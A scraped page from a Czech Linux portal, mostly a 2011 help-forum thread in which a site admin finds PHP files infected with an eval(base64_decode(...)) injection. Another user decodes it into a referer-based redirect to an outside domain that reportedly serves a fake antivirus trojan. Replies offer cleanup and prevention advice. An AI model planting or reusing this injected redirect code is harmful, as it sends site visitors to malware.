Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

Ověřování věku na úrovni operačního systému

dnes 12:22 | Komunita

Kalifornský zákon AB 1043 platný od 1. ledna 2027 vyžaduje, aby operační systémy požadovaly po uživatelích věk nebo datum narození a skrze API poskytovaly aplikacím informaci, zda je uživatel mladší 13 let, má 13 až 16 let, má 16 až 18 let nebo má alespoň 18 let. Vývojáři linuxových distribucí řeší, co s tím (Ubuntu, Fedora, …).

Ladislav Hagara | Komentářů: 38

Konference LinuxDays 2026 proběhne o víkendu 3. a 4. října

dnes 11:44 | Pozvánky

Konference LinuxDays 2026 proběhne o víkendu 3. a 4. října v Praze v areálu ČVUT v Dejvicích na FIT. Čekají vás desítky přednášek, workshopy, stánky a setkání se spoustou chytrých lidí.

Petr Krčmář | Komentářů: 0

Slovní úloha: V kterém týdnu bude mít Chrome větší číslo verze než Firefox?

dnes 00:44 | Humor

Nové verze webových prohlížečů Chrome a Firefox jsou vydávány každé 4 týdny. Aktuální verze Chrome je 145. Aktuální verze Firefoxu je 148. Od září přejde Chrome na dvoutýdenní cyklus vydávání. V kterém týdnu bude mít Chrome větší číslo verze než Firefox? 😀

Ladislav Hagara | Komentářů: 1

Další novinky od Applu: čipy M5 Pro a M5 Max, …

včera 21:55 | IT novinky

Apple představil nové čipy M5 Pro a M5 Max, MacBook Pro s čipy M5 Pro a M5 Max, MacBook Air s čipem M5 a Studio Display a nový Studio Display XDR.

Ladislav Hagara | Komentářů: 4

Installfest 2026 - hlasování o přednáškách a workshopech

včera 13:44 | Komunita

Bylo spuštěno hlasování o přednáškách a workshopech pro letošní Installfest, jenž proběhne o víkendu 28. a 29. března v Praze na Karlově náměstí 13.

Ladislav Hagara | Komentářů: 2

GIMP 3.2 RC3

včera 04:33 | Nová verze

Byla vydána (Mastodon, 𝕏) třetí RC verze GIMPu 3.2. Přehled novinek v oznámení o vydání. Podrobně v souboru NEWS na GitLabu.

Ladislav Hagara | Komentářů: 0

iPhone 17e a iPad Air s čipem M4

2.3. 21:44 | IT novinky

Apple představil iPhone 17e a iPad Air s čipem M4.

Ladislav Hagara | Komentářů: 15

Gram 1.0

2.3. 21:11 | Zajímavý software

Byla vydána verze 1.0 editoru kódů Gram. Jedná se o fork editoru Zed bez telemetrie a umělé inteligence.

Ladislav Hagara | Komentářů: 0

Oznámena spolupráce GrapheneOS s Motorolou

2.3. 20:33 | IT novinky

Byla oznámena spolupráce GrapheneOS s Motorolou. Podrobnosti v tiskové zprávě. GrapheneOS (Wikpedie) je varianta Androidu zaměřující se na bezpečnost a soukromí.

Ladislav Hagara | Komentářů: 0

Armbian 26.2.1

2.3. 02:22 | Nová verze

Armbian, tj. linuxová distribuce založená na Debianu a Ubuntu optimalizovaná pro jednodeskové počítače na platformě ARM a RISC-V, ke stažení ale také pro Intel a AMD, byl vydán ve verzi 26.2.1. Přehled novinek v Changelogu.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 25, poslední 3.2. 19:50

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Napadnuté weby

Štítky: data, download, PHP, programování

Dotaz: Napadnuté weby

9.5.2011 12:26 dusan
Napadnuté weby

Přečteno: 562×

Odpovědět | Admin

Zdravím.

Na stránkach s príponov php, na mojom servery, mám na mnohých weboch tento kód:

eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcm
VyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwi
dHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZX
JlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3
RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0
KCk7DQoJfQ0KfQ0KfQ=="));

Po prekódovaní z BASE64 to je:

Binary data detected! Click 'DOWNLOAD BINARY FILE NOW' button to download file.

WARNING!!!!
===========
Be careful what you download. If the file contains a virus, you will infect your machine!!
HIT 'BACK' when done.

Predpokladám, že mám zavírené stránky. Neviete čo to je, a ako tomu predchádzať? Poprípade existuje nejaký antivír, ktorý to dokáže odvíriť? V napadnutých doménach sa to nachádza skoro v každom php súbore.

Nástroje: Začni sledovat (0) ?

Odpovědi

9.5.2011 12:31 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

A ešte jedna vec, čo som si všimol: Zmenené súbory majú pôvodný dátum a čas.

9.5.2011 12:33 Stanislav Petr | skóre: 27 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Obecne informace jak postupovat najdete napriklad v napovede tady: http://www.hosting90.cz/cz/napoveda-jak-postupovat-pri-napadeni-stranek-skodlivym-kodem

Jako dalsi praventivni krok, pokud se jedna o server ktery slouzi pro zakazniky doplnit FTP server o antivir. Dobry zkusenosti mam s proftpd + mod_clamav (http://www.thrallingpenguin.com/resources/mod_clamav.htm)

Obvykle k tomuhle dochazi pomoci nahrani prez FTP kdy utocnik hesla nejcasteji ziskava z ulozenych udaju prave v aplikaci Total Commander.

No jo... Co bych cekal od systemu, kterej se vypina tlacitkem start... http://glux.org

9.5.2011 12:48 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Dík za info.

Ešte by ma zaujímalo, či existuje nejaký antivir ktorý by som mohol púšťať v crone, a ktorí by preskenoval vsetky domeny.

Ten kód mi nedáva zmysel. Je to len čistý text, žiadna php funkcia. Potrebujem tie stránky opraviť. Bohužiaľ sa mi weby zálohujú každý deň posledných 7 dní, MySQL posledný mesiac. Vo vecsine su zavirene aj v zalohach. Nechcem to robiť rucne, lebo ich mozem pokazit.

9.5.2011 12:53 Jakub Lucký | skóre: 40 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Po překódování z base64 mi vyšlo tohle:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://ringostart.osa.pl/");
		exit();
	}
}
}

If you understand, things are just as they are; if you do not understand, things are just as they are.

9.5.2011 12:57 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Kurva !!!

Nie som PHP programator, čo tým autor zamýšlal?

9.5.2011 13:29 Kit
Rozbalit Rozbalit vše Re: Napadnuté weby

Zkusil jsem si dát URL do browseru. Mít Windows, tak bych určitě moc klidný nebyl. Provede virtuální antivirový test a snaží se stáhnout "antivirák", tedy trojského koně.

9.5.2011 15:22 Der Teufel
Rozbalit Rozbalit vše Re: Napadnuté weby

Tenhle malware znám, odstraňoval jsem ho z několika počítačů. Hodně odolná svině. Stáhne "antimalware", který pak spouští při každém pokusu o načtení jakékoliv webové stránky, docela znepříjemní další brouzdání po netu (ukazuje furt svou webovou stránku s varováním že kvůli bezpečnosti zablokoval načítání). Samotní antimalware samozřejmě požaduje zaplacení plné verze pro odstranění "nalezených" malware a vypadá velice dobře, skvěle zapadá do systému.

9.5.2011 13:17 NN
Rozbalit Rozbalit vše Re: Napadnuté weby

V klidu je to jen presmerovani na nejakou sracku..

9.5.2011 14:44 tomvec | skóre: 24 | Kojetín
Rozbalit Rozbalit vše Re: Napadnuté weby

Ale co chudáci Widlí, co to sežerou i navijákem?

Založit nové vlákno • Nahoru

Tiskni Sdílej: